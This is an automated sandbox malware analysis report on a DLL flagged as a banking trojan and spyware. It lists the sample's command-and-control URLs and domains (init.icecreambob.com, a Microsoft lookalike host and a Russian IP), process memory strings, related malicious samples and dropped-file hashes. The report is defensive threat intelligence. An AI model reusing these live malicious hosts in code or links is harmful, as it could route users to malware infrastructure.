http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT | 100% | Avira URL Cloud | malware
http://ns.adobp/ | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic | 100% | Avira URL Cloud | malware
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://init.icecreambob.com/lbK | 100% | Avira URL Cloud | malware
http://ns.adobe.cmg | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://init.icecreambob.com/ | 100% | Avira URL Cloud | malware
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B | 100% | Avira URL Cloud | malware
http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy | 100% | Avira URL Cloud | malware
https://contoso.com/ | 0% | URL Reputation | safe
http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 | 0% | Avira URL Cloud | safe
http://ns.adobe.ux | 0% | Avira URL Cloud | safe
http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb | 100% | Avira URL Cloud | malware
http://init.icecreambob.com/l | 100% | Avira URL Cloud | malware
http://ns.micro/1 | 0% | Avira URL Cloud | safe
http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i | 100% | Avira URL Cloud | malware

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
myip.opendns.com | 102.129.143.57 | true | false | - | high
resolver1.opendns.com | 208.67.222.222 | true | false | - | high
init.icecreambob.com | 194.147.86.221 | true | true | - | unknown
art.microsoftsofymicrosoftsoft.at | 194.147.86.221 | true | true | - | unknown
222.222.67.208.in-addr.arpa | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsbgoHPm/PaJLAxVV/txoYRHBbj9M336C_2FP0F_2/FUuIUTfxn8/_2Fi1Q9Nh_2BYEyGG/g7XOKDVcckgo/6ifLOiy2t7I/1SoBj6Jybx3_2F/lN5De25izDb_2BsQi5Wix/BNFu2ADC3y17pVCQ/oz9_2B52JzEyRR4/O_2FqG0LC5012e1TXc/xR9rFY1G5/iapdd6603NTaeINQSp_2/BwLMzJ7w5SugcYmEG0J/qMt4_2FOPEov9_2Bo1MdfB/1y5TCsV89mnx3/ekW9ulBTE4wo3daXfFHw/KT | true | Avira URL Cloud: malware | unknown
http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9ImmPr12_/2Bzh4tdV/KDpXfYGpjXykhg2xrNZQnLl/eQWxO9UJs6/yiNSkrLwUALCzuZwZ/kdGCEU3rIU9m/RGyuFMKeogE/z1UGBluOo2rYqx/Sf1vojdcef_2FoAlYSwrS/eWFw3oSweCgrgQTo/R3sh0ZaR7_2BXrU/KBuwJkO2cZWh9s5jos/PpUP1bcud/5c_2B9g4iz3DCS_2B4Cz/pQllr8YcQ_2FVn4H2Us/rP5gQf2cVzgDcEADA7kdUN/KefPCJRSUE50z/YwbIZJdHqw/X0ic | true | Avira URL Cloud: malware | unknown
http://init.icecreambob.com/og7BnMlwe_2BBL3VbbSex/Z2wNM4qLt9ZGOnrN/9je8jFPaDsbcMzh/J_2BWsBwN0E9DyNOrX/d2qP1bGCk/qJX6O5QV7cikPdeCysOT/SVA8NuODHqgxyywc97o/sy0RL7jVfhXgOS_2F71qSG/2FS97AOq0AZ7i/X9_2BsM8/SJH1OhdjW9LhTsNZM3lXLoj/SkVBjHPOLQ/6GYRgOB9uQP3Kv3KV/fG6AntXu_2Fz/nGnOrkp86kX/RqEbx2FTMLsnk_/2FwjN_2B5_2BN0BKA_2FD/vDq8sU2vs2Ajys3z/1dncEwDhZBm_2B_/2BT0IVCl_2Fi1ROltK/Ns3vDVNy1/kniVonoTwHdN/F4BE_2B | true | Avira URL Cloud: malware | unknown
http://init.icecreambob.com/WD1GVGFxgZw/vdm2GeJ_2BleeD/xBKgH3gETrFFIsar7DerZ/qXw_2BmqCKfPdDFV/h8dkp6DT7p7lsEb/gtBepZBTsY8u6IZ_2B/slZYk8jOI/KWElWApc2AbPjj3JcqRW/pbQLCPSQWt3ZN3tjPe8/mXL41rn8MBcUk2OkcsuXJx/EoX5HyK9gu6tJ/HdiOJ_2F/vkfbE_2BFoaAHj2fO1r8paT/WkrWga9cjs/R1EobQ_2FVIB2FUG2/gDd0_2B_2Bn1/TZlCNHxakZo/w6E7c784GfHMDV/_2Fz5c89FcKDHFuQdUlIO/O21na4IIxgsQc_2B/zRGRLvdYbxEEQyb/llhWY2ulIai/ojLy | true | Avira URL Cloud: malware | unknown
http://art.microsoftsofymicrosoftsoft.at/F8KV2hZoxO/U2sbox634rP29bJ_2/FXULDRGEtFfT/UZYVIFvPXHK/8dhg8UXIv347p9/lAjhFuG3pLkJW9jPts5ig/H4HccXVK4_2Fj3x4/JNX_2FOInLR8Nhr/AvMOGKETT4xKlbvgKV/ywk72W2sF/XRIveNKW0cDr2x9FlGme/9PA3AGNAa4JFJCkP8Ol/kE52dtLr2Gc2GIIsbVvLY7/_2FgegwtK4luv/WlDWKBm_/2BVUH_2FoyHiVnOSkUYW3XN/ZNo_2FlFkO/0PpkXJxUPRqbyltz6/D1_2B17g8RMv/LKZDclZ4G3c/Yy5W17MUWWbx9b/ZWlGh_2BykFLR0SdMWzQw/4cxn7 | true | Avira URL Cloud: safe | unknown
http://init.icecreambob.com/2dRjaoZ5ba/_2B9OCZL2JKsW54Zw/b8_2FudlSzim/FebecF2Mr0l/RLhLAUL9EkrBQ6/jcfZJyjU6XRJEy_2F_2Fw/U4DTV9Ne0aXzpB9J/0iupMlpKOkgE91k/O1eWSmo3SiP86KIi_2/Fb913ObwC/qpNQAlO4bBFCqmydHOLy/nNarqOCZZOFGkIl4hzv/0jh_2Fn5oIgCb_2BiKYiQR/_2BU0c0XcTad1/VVgGQIES/_2B4c60XhwvhKtewqx0YhNF/9_2B9c5LC4/AStWPuhmAHWEYDBRQ/AKTTfZkbsU8X/VSsiQHsgzPR/ZrnjJVXfpIalCe/F_2BaXGFB0UzrQMjtIKjY/vg3Zv3Ys/i | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://init.icecreambob.com/FcQup_2BTAzx5PF2I3Tn/YlRrkU5iinU1xuRm5TK/CmVp_2BlzVsGcnrzGccrm7/ksEs9Imm | rundll32.exe, 00000003.00000003.826552250.0000000000AE2000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://nuget.org/NuGet.exe | powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | false | - | high
http://twitter.com/spotify: | RuntimeBroker.exe, 0000002E.00000000.997237662.000001B4FB11D000.00000004.00000001.sdmp | false | - | high
https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure | RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | false | - | high
http://ns.adobe.co/xa | RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp | false | - | high
https://corp.roblox.com/contact/ | RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | false | - | high
https://www.roblox.com/develop | RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | false | - | high
http://ns.adobp/ | RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://constitution.org/usdeclar.txtC: | loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://https://file://USER.ID%lu.exe/upd | loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low
http://init.icecreambob.com/lbK | rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://ns.adobe.cmg | RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://www.tiktok.com/legal/report/feedback | RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.g5e.com/G5_End_User_License_Supplemental_TermsW~ | RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | false | - | high
https://corp.roblox.com/parents/ | RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000011.00000002.950014356.000002644251E000.00000004.00000001.sdmp | false | - | high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms | RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | false | - | high
http://init.icecreambob.com/ | rundll32.exe, 00000003.00000003.841471789.0000000000AE2000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://constitution.org/usdeclar.txt | loaddll32.exe, 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, control.exe, 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, rundll32.exe, 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, RuntimeBroker.exe, 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, cmd.exe, 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000F.00000002.1028779233.0000029E589A0000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp | false | - | high
https://www.roblox.com/info/privacy | RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | false | - | high
http://ns.adobe.ux | RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.g5e.com/termsofservice | RuntimeBroker.exe, 0000002E.00000000.996607736.000001B4FA387000.00000004.00000001.sdmp | false | - | high
http://init.icecreambob.com/zx75I3NNGmfLGn8pRj68/5q8NiboB_2FSEFLMm1p/GkM07ifmkRoyAPVxlJaDy3/cXr6SDsb | rundll32.exe, 00000003.00000003.841424986.0000000000AF4000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
https://en.help.roblox.com/hc/en-us | RuntimeBroker.exe, 0000002E.00000000.1001958208.000001B4FA332000.00000004.00000001.sdmp | false | - | high
http://init.icecreambob.com/l | rundll32.exe, 00000003.00000003.831975638.0000000000AF4000.00000004.00000001.sdmp | true | Avira URL Cloud: malware | unknown
http://ns.micro/1 | RuntimeBroker.exe, 0000002E.00000000.1018103499.000001B4F86D9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000F.00000002.963606313.0000029E48941000.00000004.00000001.sdmp, powershell.exe, 00000011.00000002.935740628.0000026442311000.00000004.00000001.sdmp | false | - | high

                                                        Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
194.147.86.221 | init.icecreambob.com | Russian Federation | 61400 | NETRACK-ASRU | true

General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 498359
Start date: 07.10.2021
Start time: 01:30:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 14m 17s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: data.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 46
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winDLL@53/41@12/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 27.3% (good quality ratio 26.4%)
• Quality average: 80.7%
• Quality standard deviation: 27.7%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 162
• Number of non-executed functions: 336
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .dll
• Override analysis time to 240s for rundll32
Warnings:
• Excluded processes from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 20.50.102.62, 20.82.209.183, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60
• Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time | Type | Description
01:32:09 | API Interceptor | 4x Sleep call for process: loaddll32.exe modified
01:32:19 | API Interceptor | 2x Sleep call for process: rundll32.exe modified
01:32:30 | API Interceptor | 84x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match: 194.147.86.221
Associated Sample Name / URL | Detection | Context
2u2mgtylJy.dll | malicious | -

Domains

Match: myip.opendns.com
Associated Sample Name / URL | Detection | Context
test1.dll | malicious | 102.129.143.57
test1.dll | malicious | 185.32.222.18
97Ys56eAFo.dll | malicious | 84.17.52.9
new_working_conditions[2021.09.23_12-51].xlsb | malicious | 84.17.52.9
OcEyzBswGm.exe | malicious | 84.17.52.41
Invoice778465.xlsb | malicious | 185.189.150.74
o0AX0nKiUn.dll | malicious | 84.17.52.3
document-1774544026.xls | malicious | 84.17.52.79
316.xlsm | malicious | 84.17.52.79
moan.dll | malicious | 84.17.52.79
document-5505542.xlsm | malicious | 84.17.52.79
document-1223674862.xlsm | malicious | 84.17.52.79
e6.exe | malicious | 84.17.52.78
j81SoD9q5b.xls | malicious | 84.17.52.78
xls.xls | malicious | 84.17.52.38
0xyZ4rY0opA2.vbs | malicious | 84.17.52.25
6Xt3u55v5dAj.vbs | malicious | 84.17.52.25
2Q4tLHa5wbO1.vbs | malicious | 84.17.52.25
earmarkavchd.dll | malicious | 84.17.52.25
6znkPyTAVN7V.vbs | malicious | 84.17.52.25

Match: resolver1.opendns.com
Associated Sample Name / URL | Detection | Context
test1.dll | malicious | 208.67.222.222
test1.dll | malicious | 208.67.222.222
97Ys56eAFo.dll | malicious | 208.67.222.222
new_working_conditions[2021.09.23_12-51].xlsb | malicious | 208.67.222.222
20210915_id99.dll | malicious | 208.67.222.222
presentation[2021.09.09_15-26].vbs | malicious | 208.67.222.222
sample.vbs | malicious | 208.67.222.222
345678.vbs | malicious | 208.67.222.222
start[526268].vbs | malicious | 208.67.222.222
documentation_446618.vbs | malicious | 208.67.222.222
start[873316].vbs | malicious | 208.67.222.222
6bI5jJ1oIXeI.vbs | malicious | 208.67.222.222
nostalgia.dll | malicious | 208.67.222.222
Lbh0K9szYgv5.vbs | malicious | 208.67.222.222
ursi.vbs | malicious | 208.67.222.222
OcEyzBswGm.exe | malicious | 208.67.222.222
u0So5MG5rkxx.vbs | malicious | 208.67.222.222
PIfkvZ5Gh6PO.vbs | malicious | 208.67.222.222
Ry1j2eCohwtN.vbs | malicious | 208.67.222.222
Invoice778465.xlsb | malicious | 208.67.222.222

                                                          ASN

                                                          Match | Associated Sample Name / URL | Detection | Context
                                                          NETRACK-ASRU | 2u2mgtylJy.dll | malicious | 194.147.86.221
                                                          NETRACK-ASRU | NF3zeW1ZZO.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | OnjY219B7v.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | HS33i28Q3u.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | eKhZXMkd5v.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | vQP52P1Isj.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | D44D77232A9E6E684F1ECE4C9C05B3DCB63D4296CFD29.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | tWCGKtYHA3.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | 1B18CE7B513855676EF76C17FCF6B6D492F20E197FAE1.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | t7mBrAjNrV.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | 2D100CC76F229AC10A7589E1AEA0BFB47B5692840D8F2.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | 4F1F6C55849D794E71B3F37EB1C700348E31A080EAA14.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | AC8CF25A55659954E3C2BDF2A3B53115F139BE50F049A.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | FVOW699wqS.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | BB265B16D6C6DAE08BBDF4E7798FE06AA676AC4A8AA9A.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | KxZXftb514.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | dg6r7HJdd4.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | UxR7Q2lLed.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | W8o6lejZD3.exe | malicious | 194.169.163.96
                                                          NETRACK-ASRU | sAQnBjf2AF.exe | malicious | 194.169.163.96

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11606
                                                          Entropy (8bit):4.8910535897909355
                                                          Encrypted:false
                                                          SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                          MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                          SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                          SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                          SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                          Malicious:false
                                                          Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1192
                                                          Entropy (8bit):5.325275554903011
                                                          Encrypted:false
                                                          SSDEEP:24:3aEPpQrLAo4KAxCoOu42B15qRPNnCvK39tOBPnKdirh:qEPerB4BOu/9qRVnCvO9tOBfuit
                                                          MD5:D9D42CC091BE79AB1496C649F5585767
                                                          SHA1:5E23D29ACD70EE17F01DA4AB54BE562E33CC7980
                                                          SHA-256:5C0BFCE56791BB95902AF0280D2DED2FB46EEA5899AB08CB4A0955ABE86F08EA
                                                          SHA-512:6B962EDA66C17B5F531F6370C3B4567AC0CD23EE2F140B9352C4C178115C7E54CA456644D200E888AFF1A67D038E9605C8557B272377E99C2358FB856C67CFE0
                                                          Malicious:false
                                                          Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.@................Lo...QN......<Q........System.DirectoryServicesH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<................):gK..G...$.1.q........System.Configuration<...............)L..Pz.O.E.R............System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                          C:\Users\user\AppData\Local\Temp\380E.bi1
                                                          Process:C:\Windows\System32\cmd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):11
                                                          Entropy (8bit):1.2776134368191157
                                                          Encrypted:false
                                                          SSDEEP:3:111Qv:Luv
                                                          MD5:5B3345909519932D6670D92F16496463
                                                          SHA1:6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD
                                                          SHA-256:0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
